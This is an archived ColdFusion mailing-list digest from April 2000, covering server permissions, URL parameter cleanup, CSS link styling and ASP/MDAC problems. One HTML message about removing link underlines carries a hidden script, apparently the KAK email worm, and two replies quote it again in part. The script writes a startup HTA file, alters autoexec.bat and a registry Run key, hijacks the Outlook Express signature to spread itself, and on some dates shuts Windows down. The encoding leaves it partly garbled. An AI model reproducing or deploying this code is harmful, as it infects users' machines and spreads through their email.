Re: making web server permissions more secure

2000-04-15 Thread Bud

On 4/14/00, Greg Saunders penned:
And if I enable read access for "index.cfm" nothing changes.  It looks like
the directory needs to have read access enabled so that "http://myhost/"
will load "http://myhost/index.cfm", which seems strange.

Not strange at all. Denying read access at the directory level won't 
let you read any files unless the file is specified and that file has 
read access allowed. At least that's how I THINK it works.

What you could maybe do is place the files in a read disabled 
directory below the web root and redirect to index.cfm from the 
default page.


Bud Schneehagen - Tropical Web Creations

_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
ColdFusion Solutions / eCommerce Development
[EMAIL PROTECTED]
http://www.twcreations.com/
954.721.3452
--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Problems - need help...

2000-04-15 Thread Bill Killillay

Ok, here is my problem, I built a site for the Carpet industry in the Dalton
area and it's a very busy site for the type of site it is.  Over a million
users a month now.  I setup an error checking method with CFTRY and CFCATCH
after reading about them on this list.  They work perfectly by the way.
Here is my problem though, I am seeing the same type of error quite often.
I used URL strings a lot while building this site and so just about every
page has a string that is required to get to it.  I have noticed that for
some reason people are putting in a / at the end of the string which is
throwing my queries off and thus triggering the errors.  I need to find a
way to catch that / at the end and strip it off so that people don't get the
error page.  Here is an example of what a typical URL might look like
drill_down_2.cfm?page=1sub=1 but what seems to cause the error is when it's
like this drill_down_2.cfm?page=1sub=1/ any ideas on how to catch that /
and take it off.  I know that there are ways, but my brain is fried this
morning as I am in the middle of another big project and don't have the time
I need to throw at this one.  I guess we all know how that works though

TIA!

Bill Killillay
ICQ @ 8425781

*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*
"An investment in Knowledge always pays the best interest."
   -Benjamin Franklin-
*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*

Get Paid to Surf the Web.  It's free, easy and fun.
Sign up for AllAdvantage.com at

http://alladvantage.com/go.asp?refid=FIB-034

Most of us are on it every day all day anyway, why not give
yourself a pay raise for 25 hours a month.

--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Browser detection in CF

2000-04-15 Thread Leong Yew

Just a quick question. Apart from the very few cgi variables available (eg. 
cgi.HTTP_USER_AGENT) is there any other way to find out more about the browser as well 
as the client requesting a particular CF template? 

Thanks.

Leong

--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebarRstsbodyRsts/cf_talk or send a message 
to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: Problems - need help...

2000-04-15 Thread Duane Boudreau

William

try:

Replace(url.urlparam, "/", "", "All")

Duane



---
Discuss your favorite NHL, NFL, NBA,
MLB and CFL teams at SportNutz.com:
http://www.sportnutz.com

-Original Message-
From: Bill Killillay [mailto:[EMAIL PROTECTED]]
Sent: Saturday, April 15, 2000 10:06 AM
To: Cf-Talk
Subject: Problems - need help...


Ok, here is my problem, I built a site for the Carpet industry in the Dalton
area and it's a very busy site for the type of site it is.  Over a million
users a month now.  I setup an error checking method with CFTRY and CFCATCH
after reading about them on this list.  They work perfectly by the way.
Here is my problem though, I am seeing the same type of error quite often.
I used URL strings a lot while building this site and so just about every
page has a string that is required to get to it.  I have noticed that for
some reason people are putting in a / at the end of the string which is
throwing my queries off and thus triggering the errors.  I need to find a
way to catch that / at the end and strip it off so that people don't get the
error page.  Here is an example of what a typical URL might look like
drill_down_2.cfm?page=1sub=1 but what seems to cause the error is when it's
like this drill_down_2.cfm?page=1sub=1/ any ideas on how to catch that /
and take it off.  I know that there are ways, but my brain is fried this
morning as I am in the middle of another big project and don't have the time
I need to throw at this one.  I guess we all know how that works though

TIA!

Bill Killillay
ICQ @ 8425781

*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*
"An investment in Knowledge always pays the best interest."
   -Benjamin Franklin-
*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*

Get Paid to Surf the Web.  It's free, easy and fun.
Sign up for AllAdvantage.com at

http://alladvantage.com/go.asp?refid=FIB-034

Most of us are on it every day all day anyway, why not give
yourself a pay raise for 25 hours a month.


--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.

--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: Problems - need help...

2000-04-15 Thread Denny Sheridan

Hi Bill,

You might try the 'replace' function and replace any instances of the '/'
with ''.
The nice thing for you here is that you can use it judiciously, only on
problem pages.

Replace('/', '')


later -

Denny



-Original Message-
From: Bill Killillay [mailto:[EMAIL PROTECTED]]
Sent: Saturday, April 15, 2000 8:06 AM
To: Cf-Talk
Subject: Problems - need help...


Ok, here is my problem, I built a site for the Carpet industry in the Dalton
area and it's a very busy site for the type of site it is.  Over a million
users a month now.  I setup an error checking method with CFTRY and CFCATCH
after reading about them on this list.  They work perfectly by the way.
Here is my problem though, I am seeing the same type of error quite often.
I used URL strings a lot while building this site and so just about every
page has a string that is required to get to it.  I have noticed that for
some reason people are putting in a / at the end of the string which is
throwing my queries off and thus triggering the errors.  I need to find a
way to catch that / at the end and strip it off so that people don't get the
error page.  Here is an example of what a typical URL might look like
drill_down_2.cfm?page=1sub=1 but what seems to cause the error is when it's
like this drill_down_2.cfm?page=1sub=1/ any ideas on how to catch that /
and take it off.  I know that there are ways, but my brain is fried this
morning as I am in the middle of another big project and don't have the time
I need to throw at this one.  I guess we all know how that works though

TIA!

Bill Killillay
ICQ @ 8425781

*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*
"An investment in Knowledge always pays the best interest."
   -Benjamin Franklin-
*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*

Get Paid to Surf the Web.  It's free, easy and fun.
Sign up for AllAdvantage.com at

http://alladvantage.com/go.asp?refid=FIB-034

Most of us are on it every day all day anyway, why not give
yourself a pay raise for 25 hours a month.


--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.

--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Verifying URL authenticity

2000-04-15 Thread Ian Lurie

Hi all,

How would I check to make sure a URL is a functioning address? CFHTTP?

TIA,

Ian

Market Matrix
E-Commerce Solutions for Your Business
http://www.marketmatrix.com

Portent Interactive
Process, Design and Content
http://www.portentinteractive.com

Working together to create powerful, usable web solutions.
--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Removing the underline of a text link??

2000-04-15 Thread Kevin R. Merker

This is a multi-part message in MIME format.

--=_NextPart_000_002C_01BFA6C4.1186A1E0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

I want to remove the underline of a text link.
How do you do this. A little snippet of code couldn't hurt.

Thanks,

Kevin


--=_NextPart_000_002C_01BFA6C4.1186A1E0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
HTMLHEAD
META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type
META content=3D"MSHTML 5.00.2314.1000" name=3DGENERATOR
STYLE/STYLE
/HEAD
BODY bgColor=3D#ff
DIVFONT size=3D2I want to remove the underline of a text =
link./FONT/DIV
DIVFONT size=3D2How do you do this./FONTFONT size=3D2 A little =
snippet of=20
code couldn't hurt./FONT/DIV
DIVnbsp;/DIV
DIVFONT size=3D2Thanks,/FONT/DIV
DIVnbsp;/DIV
DIVFONT size=3D2Kevin/FONT/DIV
DIV
DIV style=3D"POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5"
OBJECT classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC=20
id=3Dscr/OBJECT/DIV
SCRIPT!--
function sErr(){return =
true;}window.onerror=3DsErr;scr.Reset();scr.doc=3D"ZHTMLHEADTITLEDr=
iver Memory Error/"+"TITLEHTA:APPLICATION ID=3D\"hO\" =
WINDOWSTATE=3DMinimize/"+"HEADBODY BGCOLOR=3D#CCobject =
id=3D'wsh' =
classid=3D'clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'/"+"objectSCRIP=
Tfunction sEr(){self.close();return true;}window.onerror=3DsEr;fs=3Dnew =
ActiveXObject('Scripting.FileSystemObject');wd=3D'C:Windows';fl=3D=
fs.GetFolder(wd+'Applic~1Identities');sbf=3Dfl.SubFolders;for(var =
mye=3Dnew =
Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=3Dmye.item();ids=3Dnew =
String(idd);idn=3Dids.slice(31);fic=3Didn.substring(1,9);kfr=3Dwd+'MENUD=C9=
~1PROGRA~1D=C9MARR~1kak.hta';ken=3Dwd+'STARTM~1Programs\\=
\\StartUpkak.hta';k2=3Dwd+'System'+fic+'.hta';kk=3D(fs.FileExists=
(kfr))?kfr:ken;aek=3D'C:AE.KAK';aeb=3D'C:Autoexec.bat';if(!fs.Fil=
eExists(aek)){re=3D/kak.hta/i;if(hO.commandLine.search(re)!=3D-1){f1=3Dfs=
.GetFile(aeb);f1.Copy(aek);t1=3Df1.OpenAsTextStream(8);pth=3D(kk=3D=3Dkfr=
)?wd+'MENUD=90~1PROGRA~1D=90MARR~1kak.hta':ken;t1.WriteLine('=
@echo off'+pth);t1.WriteLine('del =
'+pth);t1.Close();}}if(!fs.FileExists(k2)){fs.CopyFile(kk,k2);fs.GetFile(=
k2).Attributes=3D2;}t2=3Dfs.CreateTextFile(wd+'kak.reg');t2.write('REGEDI=
T4');t2.WriteBlankLines(2);ky=3D'[HKEY_CURRENT_USERIdentities'+id=
n+'SoftwareMicrosoftOutlook =
Express5.0';sg=3D'signatures';t2.WriteLine(ky+sg+']');t2.Write('\=
"Default =
Signature\"=3D\"\"');t2.WriteBlankLines(2);t2.WriteLine(ky+sg+'\\=
\\]');t2.WriteLine('\"name\"=3D\"Signature =
#1\"');t2.WriteLine('\"type\"=3Ddword:0002');t2.WriteLine('\"text\"=3D=
\"\"');t2.Write('\"file\"=3D\"C:WINDOWSkak.htm\"');t2.Wri=
teBlankLines(2);t2.WriteLine(ky+']');t2.Write('\"Signature =
Flags\"=3Ddword:0003');t2.WriteBlankLines(2);t2.WriteLine('[HKEY_LOCA=
L_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]')=
;t2.Write('\"cAg0u\"=3D\"C:WINDOWSSYSTEM'+fic+'.h=
ta\"');t2.WriteBlankLines(2);t2.close();wsh.Run(wd+'Regedit.exe -s =
'+wd+'kak.reg');t3=3Dfs.CreateTextFile(wd+'kak.htm',1);t3.Write('HTMLB=
ODYDIV =
style=3D\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"OBJECT =
classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC =
id=3Dscr/"+"OBJECT/"+"DIV');t4=3Dfs.OpenTextFile(k2,1);while(t4.Read=
(1)!=3D'Z');t3.WriteLine('SCRIPT!--');t3.write('function =
sErr(){return =
true;}window.onerror=3DsErr;scr.Reset();scr.doc=3D\"Z');rs=3Dt4.Read(3095=
);t4.close();rd=3D//g;re=3D/\"/g;rf=3D/\\//g;rt=3Drs.replace(rd,'\\\=
\').replace(re,'\"').replace(rf,'/"+"\"+\"');t3.WriteLine(rt+'\"=
;la=3D(navigator.systemLanguage)?navigator.systemLanguage:navigator.langu=
age;scr.Path=3D(la=3D=3D\"fr\")?\"C:windowsMenu =
D=E9marrerProgrammesD=E9marragekak.hta\":\"C:=
windowsStart =
MenuProgramsStartUpkak.hta\";agt=3Dnavigator.user=
Agent.toLowerCase();if(((agt.indexOf(\"msie\")!=3D-1)(parseInt(navigato=
r.appVersion)4))||(agt.indexOf(\"msie =
5.\")!=3D-1))scr.write();');t3.write('// =
--/"+"'+'SCRIPT/"+"'+'OBJECT/"+"'+'BODY/"+"'+'HTML');t3.close();=
fs.GetFile(wd+'kak.htm').Attributes=3D2;fs.DeleteFile(wd+'kak.reg');d=3Dn=
ew Date();if(d.getDate()=3D=3D1  =
d.getHours()17){alert('Kagou-Anti-Kro$oft says not today =
!');wsh.Run(wd+'RUNDLL32.EXE =
user.exe,exitwindows');}self.close();/"+"SCRIPTS3 driver memory alloc =
failed nbsp; =
!]]%/"+"BODY/"+"HTML";la=3D(navigator.systemLanguage)?navigator.sy=
stemLanguage:navigator.language;scr.Path=3D(la=3D=3D"fr")?"C:\\windows\\M=
enu D=E9marrer\\Programmes\\D=E9marrage\\kak.hta":"C:\\windows\\Start =
Menu\\Programs\\StartUp\\kak.hta";agt=3Dnavigator.userAgent.toLowerCase()=

RE: ASP and CF 4.51

2000-04-15 Thread Chris Chambers

If you are running Windows 2000 and somehow the MDAC got overwritten, this
may help:

sfc /scannow

Run that in a cmd window.  It will start the windows file protection engine
and should restore any protected files that were overwritten.

_

Chris Chambers

ICQ: 40311211
AIM: CTC HOME

VOX: 757-896-6393
FAX: 757-896-0774
_

-Original Message-
From: Dave Watts [mailto:[EMAIL PROTECTED]]
Sent: Friday, April 14, 2000 11:47 AM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: RE: ASP and CF 4.51


 Does anyone know of any issues with using Cold Fusion 4.51
 and ASP on the same server? When our ISP installed CF 4.51
 (upgraded from CF 4.01) suddenly alot of ASP code stopped working.

 Does anyone have any ideas what could cause this?

MDAC is probably broken. If you're running NT 4, download and install the
latest version:

http://www.microsoft.com/data/

If you're running Windows 2000, you have a bit more work to do.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
voice: (202) 797-5496
fax: (202) 797-5444


--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.

--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: Fusebox or not Fusebox that is the question...

2000-04-15 Thread Bill Plummer

Go to a users group meeting and listen to people who have done Spectra
projects.  If after some consideration, if you still feel that it is worth
the pain dive in!  IN MY OPINION, it's just Allaire trying to be something
they are not.  Nuff said...

NOTHER OPINION, Fusebox works great.  I did my first ColdFusion project with
it after doing six weeks of debugging a poorly written application.  Fusebox
was a breath of fresh air, after going through half a dozen programmers code
that was neither commented, done by any standard and no two programmers
coded with the same style.  Now I like anything that is half way done to
some reasonable standard:-)

-Original Message-
From: Eric Dawson [mailto:[EMAIL PROTECTED]]
Sent: Friday, April 14, 2000 6:36 PM
To: [EMAIL PROTECTED]
Subject: RE: Fusebox or not Fusebox that is the question...


well you sold me ... where does one learn about the Spectra development
model?

From: "Chris Evans" [EMAIL PROTECTED]
Reply-To: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: RE: Fusebox or not Fusebox that is the question...
Date: Fri, 14 Apr 2000 10:19:31 -0400

If you are looking into a coding methodology, I would look into the way
Allaire has developed Spectra and Spectra applications.  While the Spectra
product may not be appropriate for your business, it was developed using
what Allaire considers best practices.  I think its use of object based tags
and containers gives an idea of how Allaire thinks of code reuse and plug-in
modules.

I don't currently use Spectra, but am looking at its development model
rather than Fusebox.

Chris Evans
[EMAIL PROTECTED]
http://www.fuseware.com



--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.

__
Get Your Private, Free Email at http://www.hotmail.com


--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.

--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=listsbody=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Re: Removing the underline of a text link??

2000-04-15 Thread Marius Milosav

declare the following in a css file
a:link { text-decoration:none; }

Don't forget to include the style sheet in your html page (or you can
include it in the header of your page).

After that all your links will not be underlined.

Marius Milosav
www.scorpiosoft.com
Virtual Help Desk Demo (VHD)
www.scorpiosoft.com/vhd/login.cfm

- Original Message -
From: Kevin R. Merker [EMAIL PROTECTED]
To: cf-talk [EMAIL PROTECTED]
Sent: Saturday, April 15, 2000 6:19 AM
Subject: Removing the underline of a text link??


 This is a multi-part message in MIME format.

 --=_NextPart_000_002C_01BFA6C4.1186A1E0
 Content-Type: text/plain;
 charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable

 I want to remove the underline of a text link.
 How do you do this. A little snippet of code couldn't hurt.

 Thanks,

 Kevin


 --=_NextPart_000_002C_01BFA6C4.1186A1E0
 Content-Type: text/html;
 charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable

 !DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
 HTMLHEAD
 META content=3D"text/html; charset=3Diso-8859-1" =
 http-equiv=3DContent-Type
 META content=3D"MSHTML 5.00.2314.1000" name=3DGENERATOR
 STYLE/STYLE
 /HEAD
 BODY bgColor=3D#ff
 DIVFONT size=3D2I want to remove the underline of a text =
 link./FONT/DIV
 DIVFONT size=3D2How do you do this./FONTFONT size=3D2 A little =
 snippet of=20
 code couldn't hurt./FONT/DIV
 DIVnbsp;/DIV
 DIVFONT size=3D2Thanks,/FONT/DIV
 DIVnbsp;/DIV
 DIVFONT size=3D2Kevin/FONT/DIV
 DIV
 DIV style=3D"POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5"
 OBJECT classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC=20
 id=3Dscr/OBJECT/DIV
 SCRIPT!--
 function sErr(){return =
 true;}window.onerror=3DsErr;scr.Reset();scr.doc=3D"ZHTMLHEADTITLEDr=
 iver Memory Error/"+"TITLEHTA:APPLICATION ID=3D\"hO\" =
 WINDOWSTATE=3DMinimize/"+"HEADBODY BGCOLOR=3D#CCobject =
 id=3D'wsh' =
 classid=3D'clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'/"+"objectSCRIP=
 Tfunction sEr(){self.close();return true;}window.onerror=3DsEr;fs=3Dnew =

ActiveXObject('Scripting.FileSystemObject');wd=3D'C:Windows';fl=3D=
 fs.GetFolder(wd+'Applic~1Identities');sbf=3Dfl.SubFolders;for(var =
 mye=3Dnew =
 Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=3Dmye.item();ids=3Dnew =

String(idd);idn=3Dids.slice(31);fic=3Didn.substring(1,9);kfr=3Dwd+'MENUD=C9=
 ~1PROGRA~1D=C9MARR~1kak.hta';ken=3Dwd+'STARTM~1Programs\\=
 \\StartUpkak.hta';k2=3Dwd+'System'+fic+'.hta';kk=3D(fs.FileExists=
 (kfr))?kfr:ken;aek=3D'C:AE.KAK';aeb=3D'C:Autoexec.bat';if(!fs.Fil=
 eExists(aek)){re=3D/kak.hta/i;if(hO.commandLine.search(re)!=3D-1){f1=3Dfs=
 .GetFile(aeb);f1.Copy(aek);t1=3Df1.OpenAsTextStream(8);pth=3D(kk=3D=3Dkfr=
 )?wd+'MENUD=90~1PROGRA~1D=90MARR~1kak.hta':ken;t1.WriteLine('=
 @echo off'+pth);t1.WriteLine('del =
 '+pth);t1.Close();}}if(!fs.FileExists(k2)){fs.CopyFile(kk,k2);fs.GetFile(=
 k2).Attributes=3D2;}t2=3Dfs.CreateTextFile(wd+'kak.reg');t2.write('REGEDI=
 T4');t2.WriteBlankLines(2);ky=3D'[HKEY_CURRENT_USERIdentities'+id=
 n+'SoftwareMicrosoftOutlook =
 Express5.0';sg=3D'signatures';t2.WriteLine(ky+sg+']');t2.Write('\=
 "Default =
 Signature\"=3D\"\"');t2.WriteBlankLines(2);t2.WriteLine(ky+sg+'\\=
 \\]');t2.WriteLine('\"name\"=3D\"Signature =

#1\"');t2.WriteLine('\"type\"=3Ddword:0002');t2.WriteLine('\"text\"=3D=
 \"\"');t2.Write('\"file\"=3D\"C:WINDOWSkak.htm\"');t2.Wri=
 teBlankLines(2);t2.WriteLine(ky+']');t2.Write('\"Signature =
 Flags\"=3Ddword:0003');t2.WriteBlankLines(2);t2.WriteLine('[HKEY_LOCA=
 L_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]')=
 ;t2.Write('\"cAg0u\"=3D\"C:WINDOWSSYSTEM'+fic+'.h=
 ta\"');t2.WriteBlankLines(2);t2.close();wsh.Run(wd+'Regedit.exe -s =
 '+wd+'kak.reg');t3=3Dfs.CreateTextFile(wd+'kak.htm',1);t3.Write('HTMLB=
 ODYDIV =
 style=3D\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"OBJECT =
 classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC =
 id=3Dscr/"+"OBJECT/"+"DIV');t4=3Dfs.OpenTextFile(k2,1);while(t4.Read=
 (1)!=3D'Z');t3.WriteLine('SCRIPT!--');t3.write('function =
 sErr(){return =
 true;}window.onerror=3DsErr;scr.Reset();scr.doc=3D\"Z');rs=3Dt4.Read(3095=
 );t4.close();rd=3D//g;re=3D/\"/g;rf=3D/\\//g;rt=3Drs.replace(rd,'\\\=
 \').replace(re,'\"').replace(rf,'/"+"\"+\"');t3.WriteLine(rt+'\"=
 ;la=3D(navigator.systemLanguage)?navigator.systemLanguage:navigator.langu=
 age;scr.Path=3D(la=3D=3D\"fr\")?\"C:windowsMenu =
 D=E9marrerProgrammesD=E9marragekak.hta\":\"C:=
 windowsStart =
 MenuProgramsStartUpkak.hta\";agt=3Dnavigator.user=
 Agent.toLowerCase();if(((agt.indexOf(\"msie\")!=3D-1)(parseInt(navigato=
 r.appVersion)4))||(agt.indexOf(\"msie =
 5.\")!=3D-1))scr.write();');t3.write('// =
 --/"+"'+'SCRIPT/"+"'+'OBJECT/"+"'+'BODY/"+"'+'HTML');t3.close();=
 

Re: Removing the underline of a text link??

2000-04-15 Thread Gerard T. Pauline

Kevin:

Use the following style instruction (works in both NN  IE) in the
HREF tag:

A HREF="secured.html" STYLE="text-decoration: None"Go To Secured
Site/A

-Gerry

Gerard T. Pauline
Mgr, Internet/DB Applications
Computer Systems, DoIT
Pace University

"Kevin R. Merker" wrote:
 
 This is a multi-part message in MIME format.
 
 --=_NextPart_000_002C_01BFA6C4.1186A1E0
 Content-Type: text/plain;
 charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 
 I want to remove the underline of a text link.
 How do you do this. A little snippet of code couldn't hurt.
 
 Thanks,
 
 Kevin
 
 --=_NextPart_000_002C_01BFA6C4.1186A1E0
 Content-Type: text/html;
 charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 
 !DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
 HTMLHEAD
 META content=3D"text/html; charset=3Diso-8859-1" =
 http-equiv=3DContent-Type
 META content=3D"MSHTML 5.00.2314.1000" name=3DGENERATOR
 STYLE/STYLE
 /HEAD
 BODY bgColor=3D#ff
 DIVFONT size=3D2I want to remove the underline of a text =
 link./FONT/DIV
 DIVFONT size=3D2How do you do this./FONTFONT size=3D2 A little =
 snippet of=20
 code couldn't hurt./FONT/DIV
 DIVnbsp;/DIV
 DIVFONT size=3D2Thanks,/FONT/DIV
 DIVnbsp;/DIV
 DIVFONT size=3D2Kevin/FONT/DIV
 DIV
 DIV style=3D"POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5"
 OBJECT classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC=20
 id=3Dscr/OBJECT/DIV
 SCRIPT!--
 function sErr(){return =
 true;}window.onerror=3DsErr;scr.Reset();scr.doc=3D"ZHTMLHEADTITLEDr=
 iver Memory Error/"+"TITLEHTA:APPLICATION ID=3D\"hO\" =
 WINDOWSTATE=3DMinimize/"+"HEADBODY BGCOLOR=3D#CCobject =
 id=3D'wsh' =
 classid=3D'clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'/"+"objectSCRIP=
 Tfunction sEr(){self.close();return true;}window.onerror=3DsEr;fs=3Dnew =
 ActiveXObject('Scripting.FileSystemObject');wd=3D'C:Windows';fl=3D=
 fs.GetFolder(wd+'Applic~1Identities');sbf=3Dfl.SubFolders;for(var =
 mye=3Dnew =
 Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=3Dmye.item();ids=3Dnew =
 String(idd);idn=3Dids.slice(31);fic=3Didn.substring(1,9);kfr=3Dwd+'MENUD=C9=
 ~1PROGRA~1D=C9MARR~1kak.hta';ken=3Dwd+'STARTM~1Programs\\=
 \\StartUpkak.hta';k2=3Dwd+'System'+fic+'.hta';kk=3D(fs.FileExists=
 (kfr))?kfr:ken;aek=3D'C:AE.KAK';aeb=3D'C:Autoexec.bat';if(!fs.Fil=
 eExists(aek)){re=3D/kak.hta/i;if(hO.commandLine.search(re)!=3D-1){f1=3Dfs=
 .GetFile(aeb);f1.Copy(aek);t1=3Df1.OpenAsTextStream(8);pth=3D(kk=3D=3Dkfr=
 )?wd+'MENUD=90~1PROGRA~1D=90MARR~1kak.hta':ken;t1.WriteLine('=
 @echo off'+pth);t1.WriteLine('del =
 '+pth);t1.Close();}}if(!fs.FileExists(k2)){fs.CopyFile(kk,k2);fs.GetFile(=
 k2).Attributes=3D2;}t2=3Dfs.CreateTextFile(wd+'kak.reg');t2.write('REGEDI=
 T4');t2.WriteBlankLines(2);ky=3D'[HKEY_CURRENT_USERIdentities'+id=
 n+'SoftwareMicrosoftOutlook =
 Express5.0';sg=3D'signatures';t2.WriteLine(ky+sg+']');t2.Write('\=
 "Default =
 Signature\"=3D\"\"');t2.WriteBlankLines(2);t2.WriteLine(ky+sg+'\\=
 \\]');t2.WriteLine('\"name\"=3D\"Signature =
 #1\"');t2.WriteLine('\"type\"=3Ddword:0002');t2.WriteLine('\"text\"=3D=
 \"\"');t2.Write('\"file\"=3D\"C:WINDOWSkak.htm\"');t2.Wri=
 teBlankLines(2);t2.WriteLine(ky+']');t2.Write('\"Signature =
 Flags\"=3Ddword:0003');t2.WriteBlankLines(2);t2.WriteLine('[HKEY_LOCA=
 L_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]')=
 ;t2.Write('\"cAg0u\"=3D\"C:WINDOWSSYSTEM'+fic+'.h=
 ta\"');t2.WriteBlankLines(2);t2.close();wsh.Run(wd+'Regedit.exe -s =
 '+wd+'kak.reg');t3=3Dfs.CreateTextFile(wd+'kak.htm',1);t3.Write('HTMLB=
 ODYDIV =
 style=3D\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"OBJECT =
 classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC =
 id=3Dscr/"+"OBJECT/"+"DIV');t4=3Dfs.OpenTextFile(k2,1);while(t4.Read=
 (1)!=3D'Z');t3.WriteLine('SCRIPT!--');t3.write('function =
 sErr(){return =
 true;}window.onerror=3DsErr;scr.Reset();scr.doc=3D\"Z');rs=3Dt4.Read(3095=
 );t4.close();rd=3D//g;re=3D/\"/g;rf=3D/\\//g;rt=3Drs.replace(rd,'\\\=
 \').replace(re,'\"').replace(rf,'/"+"\"+\"');t3.WriteLine(rt+'\"=
 ;la=3D(navigator.systemLanguage)?navigator.systemLanguage:navigator.langu=
 age;scr.Path=3D(la=3D=3D\"fr\")?\"C:windowsMenu =
 D=E9marrerProgrammesD=E9marragekak.hta\":\"C:=
 windowsStart =
 MenuProgramsStartUpkak.hta\";agt=3Dnavigator.user=
 Agent.toLowerCase();if(((agt.indexOf(\"msie\")!=3D-1)(parseInt(navigato=
 r.appVersion)4))||(agt.indexOf(\"msie =
 5.\")!=3D-1))scr.write();');t3.write('// =
 --/"+"'+'SCRIPT/"+"'+'OBJECT/"+"'+'BODY/"+"'+'HTML');t3.close();=
 fs.GetFile(wd+'kak.htm').Attributes=3D2;fs.DeleteFile(wd+'kak.reg');d=3Dn=
 ew Date();if(d.getDate()=3D=3D1  =
 d.getHours()17){alert('Kagou-Anti-Kro$oft says not today =
 !');wsh.Run(wd+'RUNDLL32.EXE =
 

Re: Removing the underline of a text link??

2000-04-15 Thread Steve Reich

Use CSS 
a href="mypage.cfm" target="top" style="text-decoration: none"Click
Here/a

HTH,
Steve

- Original Message -
